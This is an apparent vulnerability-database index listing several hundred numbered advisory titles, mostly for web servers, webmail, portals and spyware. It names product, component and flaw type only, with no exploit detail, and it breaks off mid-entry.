[24048] Web Wiz Forums search_form.asp cross-site scripting [24027] TheWebForum login.php SQL injection [24018] SysCP WebFTP webftp_language webftp.php file include [24011] Apple AirPort Express and Extreme network interface denial of service [24007] TheWebForum register.php cross-site scripting [23985] Open-Xchange Webmail HTML cross-site scripting [23963] Chimera Web Portal System linkcategory.php SQL injection [23962] Chimera Web Portal System modules.php cross-site scripting [23941] BlackBerry Device Software Web browser JAD file denial of service [23931] Multiple Web Wiz Products check_user.asp SQL injection [23923] VEGO Web Forum index.php SQL injection [23922] Microsoft Windows embedded Open Type Web font buffer overflow [23891] DSM Light Web File Browser explorer.php directory traversal [23888] Resin Web Server DOS con device request denial of service [23884] Webwasher CSM Suite security bypass [23880] VMware ESX Server management interface code execution [23867] MIMEsweeper/Websweeper attachment content filtering bypass [23842] DOOW could allow Web site content to be accessed [23840] WebDB search module SQL injection [23807] Tolva PHP website system file include [23770] WebCal webcal.cgi cross-site scripting [23737] PHP Webthings multiple scripts SQL injection [23690] Webglimpse webglimpse.cgi cross-site scripting [23680] JRun Web Server long URL buffer overflow [23679] IBM WebSphere Application Server usernames information disclosure [23677] IBM WebSphere multiple scripts allow cross-site scripting [23662] PhpWebGallery multiple scripts SQL injection [23642] MarmaraWeb &quot [23634] MarmaraWeb page parameter allows code execution [23616] Business Objects WebIntelligence account lockout denial of service [23572] Website Baker username SQL injection [23565] PHPWebThings download.php ref SQL injection [23520] Webmin run.cgi script creates insecure temporary files [23482] WebCalendar login enumeration [23480] WebCalendar layers_toggle.php response splitting [23476] WebCalendar edit_report_handler.php SQL injection [23415] Web4Future Affiliate Manager PRO functions.php SQL injection [23391] FreeWebStat stat.php search cross-site scripting [23387] FreeWebStat logdb.html cross-site scripting [23386] PHP Web Statistik disk quota denial of service [23385] PHP Web Statistik referer field cross-site scripting [23384] PHP Web Statistik stat.php denial of service [23382] PHP Web Statistik stat.cfg and logdb.dta obtain information [23379] PHP Web Statistik cross-site scripting [23370] WebCalendar export_handler.php allows files to be overwritten [23369] WebCalendar multiple scripts allow SQL injection [23342] Apple Safari Webkit code execution [23283] AllWeb Search index.php script allows SQL injection [23277] Webmin miniserv.pl Web server component username format string [23234] Web Wiz Forums allows message titles to be obtained in hidden forums [23208] Softbiz Web Hosting Directory Script multiple SQL injections [23174] IBM WebSphere BBOORB heap corruption [23164] Sony SunnComm MediaMax AxWebRemoveCtrl ActiveX code execution [23126] Hitachi WirelessIP5000 HTTP interface configuration access [23086] LiteSpeed Web Server /admin/config/confMgr.php cross-site scripting [23047] PHPWebThings download.php script allows SQL injection [23040] Linux kernel sysctl interface denial of service [23031] SAP Web Application Server sap-exiturl HTTP header injection [23030] SAP Web Application Server sapexiturl response splitting [23029] SAP Web Application Server error message script injection [23027] SAP Web Application fameset.htm and SYSTEM PUBLIC cross-site scripting [23017] toendaCMS sensitive information stored in the Web root directory [23011] Apple Mac OS X kernel interface information disclosure [22972] PHPWebThings forum.php script could allow SQL injection [22948] F-Secure Web Console directory traversal [22834] eBASEweb SQL injection [22768] WEBADMIN login SQL injection [22750] YaPiG Website cross-site scripting [22735] phpWebSite search SQL injection [22733] GFi MailSecurity Web module buffer overflow [22730] WebGUI unknown code execution [22722] Merak Mail Server and IceWarp Web Mail help.html directory traversal [22719] BEA WebLogic Server and Express invalid login brute force [22718] BEA WebLogic Server and Express servlet relative forwarding denial of service [22716] BEA WebLogic Server and Express HTTP request smuggling [22595] BEA WebLogic Server and Express MBean file audits may fail [22593] BEA WebLogic Server and Express multicast message information disclosure [22592] BEA WebLogic Server and Express weblogic.Deployer information disclosure [22591] BEA WebLogic Server and Express allows admin user to be locked out [22590] BEA WebLogic Server and Express IIOP protocol information disclosure [22588] BEA WebLogic Server and Express password disclosure [22586] BEA WebLogic Server and Express system properties disclosure [22584] BEA WebLogic Server and Express fullyDelegateAuthorization could allow access to servlet [22583] PHP Advanced Transfer Manager web root cross-site scripting [22582] BEA WebLogic Server and Express Configuration Wizard information disclosure [22579] BEA WebLogic Server and Express security policy import [22577] BEA WebLogic Server and Express restriction of servlet allows access to files [22575] BEA WebLogic Server and Express internal servlet allows unauthorized access [22574] BEA WebLogic Server and Express privilege escalation [22573] BEA WebLogic Server and Express passphrase in plain text [22572] BEA WebLogic Server and Express IP address disclosure [22571] BEA WebLogic Server and Express audit events allow security bypass [22569] BEA WebLogic Server and Express Deployer allows elevated privileges [22568] BEA WebLogic Server and Express connection disclosure [22567] BEA WebLogic Server and Express SSL password disclosure [22563] BEA WebLogic Server and Express thread handling denial of service [22546] Sun Java System Directory Server HTTP admin interface code execution [22530] Webroot Desktop Firewall DeviceIoControl() bypass security [22529] Webroot Desktop Firewall PWIWrapper.dll buffer overflow [22519] Symantec AntiVirus Scan Engine Administrator Interface buffer overflow [22485] Merak Mail Server and IceWarp Web Mail logout.html file deletion [22484] Merak Mail Server and IceWarp Web Mail bw_list.inc path disclosure [22483] Merak Mail Server and IceWarp Web Mail multiple scripts cross-site scripting [22440] vxWeb coredll.dll file denial of service [22423] CJ Web2Mail thankyou.php or web2mail.php script, cross-site scripting [22408] ContentServ ctsWebsite parameter PHP file include [22392] Apple Mac OS X Web archives cross-site scripting [22379] Microsoft Internet Explorer Web content controlled cross-site scripting [22338] Microsoft Internet Information Server WebDAV request source code disclosure [22333] Webmin and Usermin authentication security bypass [22332] ClearQuest Web client cross-site scripting [22306] Content2Web index.php information disclosure [22305] Content2Web index.php cross-site scripting [22304] Content2Web index.php SQL injection [22303] Content2Web show script execution [22288] Groove Virtual Office Weblinks script injection [22256] man2web multiple scripts command execution [22253] Linksys WRT54G and WRT54GS management interface POST method handlers denial of service [22233] PunBB administration interface SQL injection [22225] Spymac Web category variable cross-site scripting [22210] Sun Java System Web Proxy Server unknown denial of service [22202] Open WebMail sessionid parameter cross-site scripting [22188] WebArchiveX component file manipulation [22180] WEB//NEWS startup.php script path disclosure [22179] WEB//NEWS news.php and print.php scripts SQL injection [22158] SqWebMail HTML comment cross-site scripting [22136] WebCalendar includedir parameter file include [22127] Savant Web Server registry stores passwords [22124] WebGUI multiple modules code execution [22099] Multiple vendor Web scanner command execution [22092] SaveWebPortal JavaScript code execution [22085] SaveWebPortal multiple scripts cross-site scripting [22083] SaveWebPortal menu_dx.php and menu_sx.php scripts PHP file include [22080] SaveWebPortal header.php script administrative bypass [22046] phpWebNotes php_api.php cross-site scripting [22043] SqWebMail HTML cross-site scripting [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure [22040] phpWebNotes php_api.php script file include [22008] YusASP Web Asset Manager assetmanager.asp gain access [21998] WebCalendar send_reminders.php file include [21997] SqWebMail Content-Type header script execution [21986] SaveWeb Portal file include [21984] BEA WebLogic Server and Express View Error Log cross-site scripting [21971] BEA WebLogic Portal user authorization allows security bypass [21909] phpWebSite index.php module SQL injection [21898] Apple Mac OS X SecurityInterface password disclosure [21849] Apple Mac OS X Weblog Server cross-site scripting [21844] Xitami Webserver /Con/Con denial of service [21766] MSN Web Messenger has been detected [21749] Novell NetWare Enterprise Web Server directory disclosure [21722] Lantronix Secure Console Server command interface command execution [21702] Microsoft Internet Explorer Web Folder Behaviors zone bypass [21696] NetworkActiv Web Server cross-site scripting [21694] web content management AddModifyInput.php create account [21689] web content management multiple script cross-site scripting [21670] nCipher Cryptographic Hardware Interface Library forked process disclosure [21661] Simplicity oF Upload download.php script can redirect Web page [21637] Thomson Web Skill Vantage Manager login SQL injection [21634] Website Baker Project admin/media file upload [21633] Website Baker Project URL path disclosure [21631] Website Baker browse.php cross-site scripting [21627] apage Module for WebAPP apage.cgi command execution [21597] McAfee WebShield appliance default login [21541] SPIDynamics WebInspect cross-application scripting [21535] Beehive forum webtag SQL injection [21512] KF Web Server allows attacker to view directory listings [21471] Yawp (Yet Another Web Program) conf_path file include [21469] Website Generator path disclosure [21468] Website Generator cross-site scripting [21466] Website Generator image feature file upload [21421] Novell GroupWise WebAccess component cross-site scripting [21400] WebEOC resource bypass security [21399] WebEOC public URI allows obtain information [21398] WebEOC multiple SQL Injection [21397] WebEOC large uploads cause denial of service attack [21396] WebEOC multiple cross-site scripting [21395] WebEOC weak algorithm [21394] WebEOC common key weak security [21382] Oracle9i Web Cache document weak security [21364] Darwin Streaming Server Web admin denial of service [21356] WPS Web-Portal-System wps_shop.cgi command execution [21291] phpWebSite index.php SQL injection [21264] JBoss org.jboss.we.WebServer class path disclosure [21242] Cacti administrative interface command execution [21212] Dynamic Biz Website Builder verify.asp script SQL injection [21188] Multiple Web browser JavaScript denial of service [21183] Webroot Window Washer file deletion [21157] WebCalendar view_entry.php path disclosure [21155] WebCalendar assistant_edit.php bypass security [21137] ClamAV Sendmail milter interface denial of service [21117] Symantec VERITAS Backup Exec Web Administration Console buffer overflow [21115] Asterisk manager interface buffer overflow [21104] Just William`s Amazon Webstore multiple cross-site scripting [21103] JustWilliam`s Amazon Webstore HTTP response splitting [21059] Amarok Web Frontend plugin information disclosure [21058] JBoss org.jboss.web.WebServer class path disclosure [21049] Athena Web Registration pass command execution [21048] iPlanet (Sun ONE) Server/Sun ONE Messaging Server Webmail command execution [20995] SUN Java Web Start untrusted application allows attacker elevated privileges [20987] WebHints hints.pl command execution [20967] Microsoft Exchange Outlook Web Access cross-site scripting [20946] Novell NetMail Modweb agent denial of service [20945] Novell NetMail Modweb agent cross-site scripting [20933] IBM AIX diagTasksWebSM command buffer overflow [20897] SurfControl SuperScout Web Filter HTTP bypass filter [20889] WWWeb Concepts Events System password SQL injection [20872] LiteWeb URL bypass security [20871] IBM WebSphere Application Server Administration Console buffer overflow [20861] NEXTWEB (i)Site denial of service [20858] NEXTWEB (i)Site databases/users.mdb file information disclosure [20856] NEXTWEB (i)Site login.asp script SQL injection [20818] Microsoft Windows WebClient Service buffer overflow [20816] PicoWebServer URL buffer overflow [20811] NikoSoft WebMail cross-site scripting [20802] BEA WebLogic Server and Express login page cross-site scripting [20793] BEA WebLogic Server and Express Web application allows unauthorized access [20783] Multiple vendor Web browser JavaScript window object code execution [20772] MaxWebPortal password.asp SQL injection [20769] BEA WebLogic Server and Express loop denial of service [20768] BEA WebLogic Portal password information disclosure [20719] Ipswitch IMail Server Web Calendaring information disclosure [20708] BEA WebLogic Server and Express error page cross-site scripting [20706] BEA WebLogic Server and Express incorrect cookie parsing [20704] BEA WebLogic Server and Express identity thread manipulation [20703] BEA WebLogic Server and Express JDBC pool modification [20671] Gentoo webapp-config fn_show_postinst temp file [20651] WillingWebCam ww.exe obtain information [20631] Sigma ISP Manager sigmeweb.dll SQL injection [20615] WebcamXP chat name denial of service [20607] Webmin configuration file permissions [20579] KorWeblog lng parameter directory traversal [20562] MaxWebPortal post.asp SQL injection [20561] MaxWebPortal post.asp script injection [20560] MaxWebPortal post.asp cross-site scripting [20557] Neteyes NexusWay Web module command execution [20544] Guestbook PRO module for WebAPP cross-site scripting [20478] 4D WebSTAR V Tomcat plug-in buffer overflow [20472] Merak Mail Server and IceWarp Web Mail arbitrary file existence [20471] Merak Mail Server and IceWarp Web Mail viewaction.html and importaction.html file and directory manipulation [20469] Merak Mail Server and IceWarp Web Mail multiple scripts path disclosure [20467] Merak Mail Server and IceWarp Web Mail multiple scripts cross-site scripting [20444] RSA SecurID Web Agent buffer overflow [20413] 04WebServer directory traversal [20381] Web Crossing WebX webx cross-site scripting [20380] Microsoft Windows Web View command execution [20356] Open WebMail open function command execution [20339] Squid Web Proxy Cache HTTP header cache poisoning [20335] MaxWebPortal multiple scripts SQL injection [20334] Squid Web Proxy Cache httpProcessReplyHeader security bypass [20311] Oracle Application Server UseWebcacheIP mod_access bypass [20310] Oracle9iAS Application Server and Web Cache file modification [20309] Oracle9iAS Application Server and Web Cache cross-site scripting [20292] MaxDB getIfHeader WebDAV function buffer overflow [20276] BEA WebLogic Server JndiFramesetAction cross-site scripting [20271] SqWebMail HTTP response splitting attack [20270] MaxDB WebDAV getLockTokenHeader function buffer overflow [20261] IBM WebSphere Application Server error page cross-site scripting [20238] Novell Nsure Audit webadmin.exe denial of service [20217] netMailshar Professional Webmail service directory traversal [20195] Sun Java System Web Proxy Server buffer overflow [20176] GeneWeb maintainer scripts insecure file permissions [20168] WheresJames Webcam Publisher buffer overflow [20166] WebcamXP chat name cross-site scripting [20151] PMSoftware Simple Web Server buffer overflow [20099] IBM WebSphere Application Server information disclosure [20082] Sun Java System Web Server denial of service [20075] WebCT message cross-site scripting [20026] Microsoft Outlook and Outlook Web Access email client address spoofing [20017] Webwasher CSM navTo2 parameter cross-site scripting [19949] Turnkey Website Shopping Cart SearchResults.php script SQL injection [19929] MaxWebPortal links_add_form.asp cross-site scripting [19928] MaxWebPortal events_functions.asp SQL injection [19888] web-app.org WebAPP unspecified information disclosure [19813] SurgeMail webmail.exe cross-site scripting [19804] SurgeMail Webmail &quot [19779] betaparticle blog Web root information disclosure [19756] Sun Java Web Start JNLP property tag privilege elevation [19740] NotifyLink Enterprise Server interface plaintext password [19700] IBM WebSphere Commerce information disclosure [19657] Xerox MicroServer Web Server URL denial of service [19654] Active WebCam file disclosure [19653] Active WebCam memory exhaustion denial of service [19652] Active WebCam path disclosure [19651] WEBinsta Mailing Manager inc/initdb.php file include [19650] Active WebCam filelist.html denial of service [19647] Active WebCam floppy disk request denial of service [19618] phpWebLog include/init.inc.php script PHP file include [19602] Xerox MicroServer Web Server unauthenticated default account security bypass [19584] IBM WebSphere allows connection without a password [19539] BEA WebLogic Server and Express banner has been enabled [19493] CIS WebServer dot dot directory traversal [19487] WebMod server.cpp script heap based buffer overflow [19482] phpWebSite Announce module allows code execution [19480] phpWebSite index.php search module path disclosure [19404] Xinkaa WEB Station directory traversal [19394] WebConnect WCP_USER parameter directory traversal [19393] WebConnect device name denial of service [19369] WebCalendar webcalendar_session parameter SQL injection [19346] PHP-Nuke Downloads and Web Links modules cross-site scripting [19335] Open WebMail logindomain cross-site scripting [19332] Squid Web Proxy Cache xstrndup function denial of service [19321] BEA Web Logic Server and Express authentication disclosure [19315] Webmin encrypted password [19313] ELOG weblog buffer overflow [19308] IBM WebSphere Application Server JSP information disclosure [19258] 602LAN Suite webmail directory traversal [19236] multiple Web browsers IDN URL spoofing [19225] Microsoft Outlook Web Access owalogon.asp script URL redirect [19179] Eternal Lines Web Server multiple connection denial of service [19177] Savant Web Server buffer overflow [19162] WebAdmin modalframe.wdm file HTML injection [19161] Alt-N Technologies WebAdmin useredit_account.wdm cross-site scripting [19158] Merak Mail Server with IceWarp Web Mail importaction.html allows files to be viewed [19157] Merak Mail Server with IceWarp Web Mail accountsettings_add.html allows files to be created [19153] Merak Mail Server with IceWarp Web Mail weak password encryption [19152] Merak Mail Server with IceWarp Web Mail user path disclosure [19147] Merak Mail Server with IceWarp Web Mail multiple cross-site scripting [19144] WebWasher Classic connect gain access [19142] Squid Web Proxy Cache recvfrom denial of service [19060] Squid Web Proxy Cache HTTP header cache poisoning [19049] BRIBBLE webadmin authentication bypass [19036] SquirrelMail webmail.php cross-site scripting [19007] Squid Web Proxy Cache NTLM type 3 message denial of service [18983] Squid Web Proxy Cache LDAP ACL security bypass [18955] Novell GroupWise WebAccess Userid HTML injection [18954] Novell GroupWise WebAccess error bypass authentication [18895] MaxDB websql buffer overflow [18888] Squid Web Proxy Cache gopherToHTML buffer overflow [18884] Squid Web Proxy Cache WCCP denial of service [18864] Multiple vendor Web browser modal dialog spoofing [18862] WebSeries report execution [18860] WebSeries Payment Application password gain access [18852] WebSeries Payment Application obtain information [18850] WebSeries Payment Application password weak security [18848] WebSeries Payment Application URL security bypass [18838] WebSeries Payment Application path disclosure [18818] Squid Web Proxy Cache NTLM fakeauth_auth helper denial of service [18791] Jeuce Personal Web Server URL denial of service [18787] Jeuce Personal Web Server dot dot directory traversal [18759] The Web server is running PHP on the system [18717] KorWeblog index.php PHP file include [18648] SurgeMail unspecified Webmail vulnerability [18554] pgn2web pgn2web.c buffer overflow [18505] iWebNegar comments, index, and administrator SQL injection [18490] Multiple Web browsers Content-Type spoofing [18474] ASP Calendar allows access to administrative interface [18468] Sun Java System Web and Application Server obtain information [18406] Squid Web Proxy Cache hostname information disclosure [18399] WebLibs weblibs.pl directory traversal [18397] Multiple vendor Web browsers could spoof a pop-up window [18386] MaxDB WebDav buffer overflow [18384] Multiple Web browsers FTP command execution [18361] IBM WebSphere update information disclosure [18339] Microsoft Windows kernel LPC interface gain privileges [18282] Multiple vendor Web browsers nested array denial of service [18278] Hitachi Groupmax World Wide Web template names directory traversal [18277] Hitachi Groupmax World Wide Web QUERY cross-site scripting [18251] FunWebProducts bundler software program contains spyware [18234] KorWeblog viewimg.php script directory traversal [18187] WebGUI user profile [18139] Claria.WebSecureAlert displays advertisments [18090] Google Desktop view Web History archive [18087] IceWarp Web Mail unspecified vulnerability [18060] Webroot Spy Sweeper Enterprise administrative password in plain text [18046] phpWebSite response splitting [18041] Firewire/IEEE 1394 interface installed [18036] 04WebServer DOS devices denial of service [18034] 04WebServer Web log spoofing [18033] 04WebServer error cross-site scripting [18030] WebCalendar multiple .php scripts allows elevated access [18029] WebCalendar validate.php encoded_login path disclosure [18028] WebCalendar init.php file include [18027] WebCalendar response splitting [18026] WebCalendar IMG SRC cross-site scripting [17976] Merak Mail Server IceWarp Web Mail deletes and moves files and directories [17975] Merak Mail Server Icewarp Web Mail uses weak encryption [17974] Merak Mail Server Icewarp Web Mail allows directory creation [17973] Merak Mail Server Icewarp Web Mail cross-site scripting [17961] Apache Web server ServerTokens has not been set [17941] Sun Java System Web and Application Server denial of service [17934] Cherokee Web Server format string [17920] Sun Java System Web Proxy Server buffer overflow [17919] Caudium Web Server denial of service [17906] Microsoft ISA Server and Proxy Server allow Web site spoofing caused by cache reverse lookup results [17905] Cyber Web Filter allows attacker to bypass IP address [17795] Abyss Web Server device name denial of service [17789] Multiple vendor Web browsers inactive tab information disclosure [17788] Multiple vendor Web browsers inactive tab dialog spoofing [17737] Express-Web cross-site scripting [17690] IceWarp Web Mail view.html unspecified vulnerability [17689] IceWarp Web Mail cross-site scripting [17688] Squid Web Proxy Cache SNMP asn_parse_header denial of service [17654] Microsoft Internet Explorer cache from SSL Web sites obtain information [17652] Microsoft Internet Explorer Double Byte Character Set spoof Web site to obtain information [17645] Microsoft Internet Information Server WebDAV multiple attributes per XML elements cause denial of service [17599] NetworkActiv Web Server HTTP GET denial of service [17565] aspWebCalendar account name information disclosure [17520] MyWebServer allows administrative access [17519] MyWebServer multiple connections denial of service [17507] aspWebAlbum SQL injection [17506] aspWebCalendar calendar.asp script SQL injection [17422] WebIntelligence URL request allows file deletion [17419] WebIntelligence input and document cross-site scripting [17417] Multiple vendor Web browsers non-secure cookie hijack session [17415] Multiple vendor Web browsers allows attacker to hijack a user`s session [17408] MyWaySpeedBar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17407] DealHelper attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17406] Praize Toolbar displays advertisements and resets the Web home page [17397] IETray spyware hijacks Web page setting and redirects browsing sessions to obtain information [17395] AdButler spyware attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17360] BEA WebLogic Server and Express allow access to restricted URLs [17359] BEA WebLogic Server and Express RMI admin command execute [17358] BEA WebLogic Server and Express utilities and tasks plaintext password [17357] BEA WebLogic Server and Express password disclosure [17356] BEA WebLogic Server and Express HTTP version disclosure [17354] BEA WebLogic Server and Express errors result in incomplete security [17352] BEA WebLogic Server and Express Active Directory LDAP fails to remove admin privileges [17350] BEA WebLogic Server and Express JNDI unbinding objects to obtain information [17348] BEA WebLogic Server and Express administration port plaintext information [17319] Merak Mail Server Icewarp Web Mail allows attacker to modify file [17318] Merak Mail Server Icewarp Web Mail deletes and moves files and directories [17317] Merak Mail Server Icewarp Web Mail creates file [17316] Merak Mail Server Icewarp Web Mail view attachments [17315] Merak Mail Server Icewarp Web Mail path disclosure [17314] Merak Mail Server Icewarp Web Mail allows directory creation [17313] Merak Mail Server Icewarp Web Mail cross-site scripting [17299] Usermin installation of directory prior to installation of interface causes unspecified issue [17293] Usermin Web mail function allows command execution [17274] OpenCA Web front end allows cross-site scripting [17222] Ipswitch IMail Web Messaging denial of service attack [17220] Ipswitch Web Calendaring server denial of service [17218] Squid Web Proxy Cache NTLMSSP packet denial of service [17211] phpWebSite HTTP GET command execution [17203] phpWebSite notes module script injection [17202] phpWebSite comments module cross-site scripting [17199] phpWebSite calendar module SQL injection [17128] Webpac SQL injection [17110] Easy File Sharing Web Server multiple HTTP requests denial of service [17109] Easy File Sharing Web Server obtain information [17100] web-app.org WebAPP index.php directory traversal [17089] Multiple vendor Web browsers IFRAME denial of service [17055] Nihuo Web Log Analyzer HTTP GET cross-site scripting [17035] Web browser shell: and .exe have been detected [17005] PHPMyWebHosting pmwh.php SQL injection [16991] vRating admin directory allows access to administrative interface [16960] MIMEsweeper for Web directory traversal [16955] IceWarp Web Mail SQL injection [16954] IceWarp Web Mail guest account path disclosure [16952] IceWarp Web Mail calendar cross-site scripting [16944] Apple Safari Web POST data information disclosure [16934] IBM Tivoli Access Manager and WebSphere Application Server response splitting [16901] Free Web Chat multiple connection denial of service [16893] Free Web Chat usermanager.java denial of service [16854] Webcam Watchdog sresult.exe cross-site scripting [16852] Webbsyte Chat denial of service [16837] Mozilla and Firefox user interface spoofing [16835] lostBook Email and Website cross-site scripting [16822] Hitachi Web Page Generator cross-site scripting [16821] Hitachi Web Page Generator denial of service [16806] EasyWeb FileManager pathext and view variable directory traversal [16779] Web Helpdesk jobedit.asp SQL injection [16775] Web+Center Cookie object SQL injection [16766] Cisco ONS devices TL1 interface bypass authentication [16749] AnomicHTTPProxy administration interface denial of service [16710] eXtropia WebStore command execution [16701] Gattaca Server web.tmpl cross-site scripting [16689] 4D WebSTAR Server V symlink attack [16688] 4D WebSTAR Server V allows attacker to view php.ini files [16687] 4D WebSTAR Server V allows attacker to view directory listing [16686] 4D WebSTAR Server V long FTP command buffer overflow [16683] INweb Mail Server multiple connections denial of service [16643] Mbedthis AppWeb VirtualHost bypass authorization [16642] Mbedthis AppWeb improper HEAD and TRACE request handling [16640] Mbedthis AppWeb message information disclosure [16638] Mbedthis AppWeb URI allows access to restricted resources [16636] Mbedthis AppWeb character information disclosure [16603] Dr.Web scanMail buffer overflow [16596] IBM Lotus Domino Web Access denial of service [16588] Enceladus Server Suite Web service directory traversal [16549] Open WebMail vacation.pl program execution [16534] BEA WebLogic Server and Express bypass asterisk role [16513] Infinity WEB login SQL injection [16481] ArbitroWeb rawURL cross-site scripting [16467] SqWebMail print_header-uc function cross-site scripting [16448] Microsoft MN-500 Web administration denial of service [16439] webAuction allows deletion of items [16424] Web Wiz Forums registration_rules.asp cross-site scripting [16421] BEA WebLogic Server and Express allows unexpected user identity [16419] BEA WebLogic Server and Express SSL denial of service [16415] Linksys Web Camera main.cgi cross-site scripting [16384] Microsoft ISA Server Web Proxy redirect denial of service [16380] Microsoft ISA Server Web Proxy SSL denial of service [16360] Squid Web Proxy Cache NTLM buffer overflow [16339] Linksys Web Camera file include [16334] Webmin username or password denial of service [16333] Webmin allows security restriction bypass [16275] TinyWeb GET request allows attacker to download scripts [16266] WildTangent WTHoster and WebDriver buffer overflow [16170] Php-Nuke show weblink path disclosure [16156] WebCT iframe, img, and object tags cross-site scripting [16153] Squid Web Proxy Cache URL security bypass [16123] BEA WebLogic Server and Express unauthorized access to Web applications [16121] BEA WebLogic Server and Express bypass server policy [16101] MyWeb long GET buffer overflow [16076] SurgeLDAP bypass authentication allows access to administrative interface [16048] AWeb &quot [16047] Aldo`s Web Server path disclosure [16031] Web Wiz Forums unauthorized IP blocking [16030] Web Wiz Forums pop_up_topic_admin.asp modify topic [16029] Web Wiz Forums pop_up_ip_blocking.asp SQL injection [15934] PostNuke Downloads, Web_Links, and openwindow.php cross-site scripting [15928] BEA WebLogic Server and Express allows EJB object deletion [15927] BEA WebLogic Server and Express URL pattern syntax information disclosure [15926] BEA WebLogic stores administrative username and password in plain text [15924] Cherokee Web Server print error function format string [15890] X-Micro WLAN router default administrative interface login [15865] BEA WebLogic Server and Express allows administrator or operator privileges [15862] BEA WebLogic Server and Express custom trust manager certificate spoofing [15861] BEA WebLogic Server and Express Authentication provider allows elevated privileges [15860] BEA WebLogic Server and Express config.xml files stores usernames and passwords in plain text [15829] X-Micro WLAN 11b Broadband Router default administrative interface account [15826] BEA WebLogic connects multiple times allowing access to system [15822] Open WebMail allows for unauthorized creation of directories [15821] Kerio Personal Firewall Web filtering denial of service [15743] MSWebDVD ActiveX Control long password buffer overflow [15725] Encore Web Forum display.cgi command execution [15676] Oracle Application Server Single Sign-On login Web page spoofing [15652] WebCT Campus Edition @import cross-site scripting [15567] xweb &quot [15523] Twilight Utilities Web Server postifle.exe file creation [15515] Twilight Utilities Web Server postfile.exe attfile parameter buffer overflow [15506] Fizmez Web Server NULL error denial of service [15504] IBM Lotus Domino webadmn.nsf file disclosure [15502] IBM Lotus Domino webadmin.nsf cross-site scripting [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server [15466] HP Web-enabled Management Software HTTP Server unauthorized certificate upload [15463] Oracle9i Application Server Web Cache HTTP Request Method buffer overflow [15454] CFWebstore URL cross-site scripting [15453] EMU Webmail init.emu path disclosure [15452] EMU Webmail login cross-site scripting [15451] EMU Webmail emumail.fcgi cross-site scripting [15450] IBM WebSphere Application Server unknown issue [15447] CFWebstore index.cfm SQL injection [15444] Open WebMail userstat.pl allows execution of commands [15436] Pegasi Web Server cross-site scripting [15435] Pegasi Web Server &quot [15424] Multiple vendor Web browsers bypass cookie path restriction [15413] Apple Safari Web browser application large array denial of service [15405] SURECOM Web configuration denial of service [15404] PWebServer dot dot directory traversal [15399] SLMail Pro SLWebmail buffer overflows [15383] DAWKCo POP3 Server with WebMAIL extension session reactivation [15381] GWeb HTTP Server directory traversal [15360] IA WebMail Server email spoofing [15359] IA WebMail Server view and edit_contact cross-site scripting [15358] IA WebMail Server view and edit_contact denial of service [15357] IA WebMail Server username buffer overflow [15325] Dell OpenManage Web Server OCSGetOEMINIPathFile function buffer overflow [15315] jgs Web server CGI cross-site scripting [15289] WebzEdit done.jsp cross-site scripting [15254] WebStores 2000 error.asp cross-site scripting [15253] WebStores 2000 browse_items.asp SQL injection [15239] Vizer Web Server long string denial of service [15238] APC`s Web/SNMP Management SmartSlot Card default password [15219] phpWebSite announce and notes module SQL injection [15122] MaxWebPortal register form cross-site scripting [15121] MaxWebPortal Personal Messages SQL injection [15120] MaxWebPortal dl_showall.asp, Personal Messages, and down.asp cross-site scripting [15115] PHP-Nuke Search and Web_links modules SQL injection [15112] Webservect backdoor [15058] SqWebMail login error information disclosure [15023] Zope ZSearch interface cross-site scripting [15022] Web Crossing Content-Length header denial of service [15019] Web Blog file parameter command execution [15018] Forum Web Server post1.htm or postfile2.htm scripts cross-site scripting [14993] Apple Mac OS X Safari Web browser undisclosed security issue [14978] Web Blog &quot [14977] BRS WebWeaver ISAPISkeleton.dll cross-site scripting [14962] BEA WebLogic Server and Express users with Operator permissions information disclosure [14961] BEA WebLogic Server and Express config.xml file stores password in plain text [14959] BEA WebLogic Server and Express HTTP TRACE cross-site scripting [14957] BEA WebLogic Server and Express managed server password disclosure [14939] Gaim yahoo_web_pending cookie header buffer overflow [14932] Reptile Web Server HTTP GET request denial of service [14926] Mbedthis AppWeb OPTIONS or GET request denial of service [14921] Novell NetWare Enterprise Web Server Perl information disclosure [14919] Novell NetWare Enterprise Web Server CGI2PERL module cross-site scripting [14915] NetBus Pro Web Server &quot [14904] webcamXP cross-site scripting [14893] WebTrends Reporting Center viewreport.pl path disclosure [14892] 2Wire HomePortal Web form script allows cross-site scripting [14891] NetCam Web Server running NetCam Viewer &quot [14890] GoAhead WebServer content length parameter HTTP POST denial of service [14889] GoAhead WebServer websUrlHandlerRequest function source code disclosure [14879] GetWare WebCam Live HTTP request negative length denial of service [14825] Symantec Web Security blocked site cross-site scripting [14609] ZyncosMark attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14605] ZeroPopup hijacks Web page setting and redirects browsing sessions to obtain information [14601] WurldMedia attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14599] World Wide WebMarketing may establish dial-up connections without a user`s knowledge [14598] WishBone Toolbar hijacks Web page setting and redirects browsing sessions to obtain information [14595] WinlogonEXE hijacks Web page setting and redirects browsing sessions to obtain information [14594] WinLocator BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14568] Whazit hijacks Web page setting and redirects browsing sessions to obtain information [14567] webHancer obtain information [14566] WebDialer may establish dial-up connections without a user`s knowledge and allows execution of code [14565] Web3000 opens advertisements and obtains information [14560] VX2.BC777(SiteHlprBHO) attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14556] Virusek Hijacker hijacks Web page setting [14540] Transponder acts as part of the Web browser to bypass security software and allows execution of code [14537] TopSearch attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14529] Thesten attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14524] SysWeb-Telecom Dialer may establish dial-up connections without a user`s knowledge [14504] ShopNav Hijacker attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14503] ShopForGood hijacks Web page setting and redirects browsing sessions to obtain information [14496] Secret-Crush hijacks Web page setting and obtains information [14494] SearchWWW attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14493] SearchV spyware hijacks Web page setting and redirects browsing sessions to obtain information [14475] RightFinder hijacks Web page setting and redirects browsing sessions to obtain information [14461] PSN - Private Search Network hijacks Web page setting and redirects browsing sessions to obtain information [14459] ProDyne Webinstall obtain information [14455] Possible Browser Hijack 